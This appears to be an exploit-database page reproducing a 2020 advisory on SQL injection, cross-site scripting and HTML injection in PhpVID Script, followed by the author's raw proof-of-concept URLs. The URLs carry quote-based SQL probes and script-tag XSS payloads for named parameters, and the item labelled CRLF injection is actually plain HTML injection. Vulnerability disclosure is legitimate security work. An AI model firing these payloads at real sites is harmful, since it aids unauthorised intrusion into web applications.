header-logo
Suggest Exploit
vendor:
PhpVID Script
by:
3spi0n
8,8
CVSS
HIGH
SQL Injection, XSS, CRLF Injection
89, 79, 20
CWE
Product Name: PhpVID Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

PhpVID Script, Multiple Vulnerabilities

The PhpVID Script is vulnerable to multiple vulnerabilities such as SQL Injection, XSS and CRLF Injection. The SQL Injection vulnerabilities can be exploited by passing malicious payloads in the 'cat' and 'n' parameters of the browse_videos.php, groups.php and members.php files. The XSS vulnerability can be exploited by passing malicious payloads in the 'cat', 'n' and 'query' parameters of the browse_videos.php, groups.php and search_results.php files. The CRLF Injection vulnerability can be exploited by passing malicious payloads in the 'query' parameter of the search_results.php file.

Mitigation:

The application should be configured to validate user input and filter out malicious payloads. The application should also be configured to use parameterized queries to prevent SQL Injection attacks.
Source

Exploit-DB raw data:

##################################################################################
  _____                 _       _   _                _____           
 |  __ \               | |     | | (_)              / ____|          
 | |__) |_____   _____ | |_   _| |_ _  ___  _ __   | (___   ___  ___ 
 |  _  // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \   \___ \ / _ \/ __|
 | | \ \  __/\ V / (_) | | |_| | |_| | (_) | | | |  ____) |  __/ (__ 
 |_|  \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| |_____/ \___|\___|
                                                                                                                                        
##################################################################################																
PhpVID Script, Multiple Vulnerabilities
Product Page: http://www.vastal.com/phpvid-the-video-sharing-software.html

Author(Pentester): 3spi0n
On Web: RevolutionSec.Com - GraySecure.Org
On Social: Twitter.Com/eyyamgudeer
##################################################################################

[1] SQL Injection Vulnerabilities on Demo Site

[+] (browse_videos.php, n Param)
>>> http://server//browse_videos.php?cat=&n='1

[+] (groups.php, cat Param)
>>> http://server/groups.php?cat='1

[+] (members.php, n Param)
>>> http://server/members.php?browse=recent&n='1

[2] XSS Vulnerability on Demo Site

[+] (browse_videos.php, n Param)
>>> http://server/browse_videos.php?cat=&n=1'<ScRiPt >prompt(959580)</ScRiPt>

[+] (groups.php, cat Param)
>>> http://server//groups.php?cat=1'<ScRiPt >prompt(987925)</ScRiPt>

[+] (search_results.php.php, query Param)
>>> http://server//search_results.php?query=<ScRiPt >prompt(931776)</ScRiPt>

[3] CRLF Injection Vulnerability on Demo Site
>>> http://server/search_results.php?query=<marquee><h1>come to dance! <br>by, 3spi0n</h1></marquee>